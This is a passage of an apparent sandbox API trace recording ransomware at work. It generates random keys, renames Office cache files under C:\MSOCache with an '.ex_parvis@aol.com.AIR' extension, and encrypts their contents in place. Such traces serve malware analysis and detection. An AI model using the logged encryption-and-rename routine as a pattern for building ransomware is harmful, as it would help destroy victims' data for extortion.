(in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0157.718] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", dwFileAttributes=0x80) returned 1 [0157.719] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 76 [0157.719] GetProcessHeap () returned 0x2e0000 [0157.719] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0157.719] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" [0157.719] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0157.719] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0157.722] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c [0157.722] GetProcessHeap () returned 0x2e0000 [0157.722] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0157.722] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=36233052) returned 1 [0157.722] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x228df5c [0157.722] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0157.722] GetProcessHeap () returned 0x2e0000 [0157.722] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0157.722] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0157.722] WriteFile (in: hFile=0x37c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0157.725] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0157.725] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0157.725] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x228df5c) returned 0x33d0020 [0157.726] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x228df5c) returned 0x5660020 [0157.727] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.727] ReadFile (in: hFile=0x37c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x228df5c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x228df5c, lpOverlapped=0x0) returned 1 [0160.144] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.144] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.145] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll", dwFileAttributes=0x80) returned 1 [0160.145] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 74 [0160.145] GetProcessHeap () returned 0x2e0000 [0160.145] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfa) returned 0x363a50 [0160.145] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" [0160.145] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR" [0160.145] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.148] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c [0160.148] GetProcessHeap () returned 0x2e0000 [0160.149] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.149] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=7378792) returned 1 [0160.149] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x709768 [0160.149] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.149] GetProcessHeap () returned 0x2e0000 [0160.149] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.149] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.149] WriteFile (in: hFile=0x37c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.151] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.151] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.151] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x709768) returned 0x33d0020 [0160.151] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x709768) returned 0x3ae0020 [0160.152] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.152] ReadFile (in: hFile=0x37c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x709768, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x709768, lpOverlapped=0x0) returned 1 [0160.557] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.557] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.557] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe", dwFileAttributes=0x80) returned 1 [0160.558] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 71 [0160.558] GetProcessHeap () returned 0x2e0000 [0160.558] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf4) returned 0x31f5f0 [0160.558] lstrcpyW (in: lpString1=0x31f5f0, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" [0160.558] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR" [0160.558] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.561] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c [0160.561] GetProcessHeap () returned 0x2e0000 [0160.561] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31f5f0 | out: hHeap=0x2e0000) returned 1 [0160.561] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=174440) returned 1 [0160.561] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2a968 [0160.561] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.561] GetProcessHeap () returned 0x2e0000 [0160.561] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.561] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.561] WriteFile (in: hFile=0x37c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.563] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.563] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.563] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2a968) returned 0x30d0048 [0160.564] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2a968) returned 0x30fa9b8 [0160.564] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.564] ReadFile (in: hFile=0x37c, lpBuffer=0x30d0048, nNumberOfBytesToRead=0x2a968, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesRead=0x2acf9c8*=0x2a968, lpOverlapped=0x0) returned 1 [0160.568] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.569] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.569] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", dwFileAttributes=0x80) returned 1 [0160.569] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 78 [0160.569] GetProcessHeap () returned 0x2e0000 [0160.569] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x336dd8 [0160.569] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0160.569] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0160.569] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.571] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c [0160.571] GetProcessHeap () returned 0x2e0000 [0160.571] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0160.571] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=4274) returned 1 [0160.571] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10b2 [0160.571] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.571] GetProcessHeap () returned 0x2e0000 [0160.571] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.571] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.572] WriteFile (in: hFile=0x37c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.573] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.573] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.573] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10b2) returned 0x3a7410 [0160.573] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10b2) returned 0x3a84d0 [0160.573] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.573] ReadFile (in: hFile=0x37c, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x10b2, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x10b2, lpOverlapped=0x0) returned 1 [0160.574] SetFilePointer (in: hFile=0x37c, lDistanceToMove=-4274, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.574] WriteFile (in: hFile=0x37c, lpBuffer=0x3a84d0*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a84d0*, lpNumberOfBytesWritten=0x2acf9c8*=0x10b2, lpOverlapped=0x0) returned 1 [0160.574] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0160.574] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a84d0 | out: hHeap=0x2e0000) returned 1 [0160.574] CloseHandle (hObject=0x37c) returned 1 [0160.574] GetProcessHeap () returned 0x2e0000 [0160.574] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.574] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.574] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.574] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385620 | out: hHeap=0x2e0000) returned 1 [0160.574] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385578 | out: hHeap=0x2e0000) returned 1 [0160.574] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385578 [0160.574] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.574] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.574] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.574] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.575] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi", dwFileAttributes=0x80) returned 1 [0160.575] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 78 [0160.575] GetProcessHeap () returned 0x2e0000 [0160.575] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x336dd8 [0160.575] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" [0160.575] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0160.575] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.577] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c [0160.578] GetProcessHeap () returned 0x2e0000 [0160.578] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0160.578] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1992192) returned 1 [0160.578] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1e6600 [0160.578] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.578] GetProcessHeap () returned 0x2e0000 [0160.578] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.578] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.578] WriteFile (in: hFile=0x37c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.580] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.580] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1e6600) returned 0x33d0020 [0160.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1e6600) 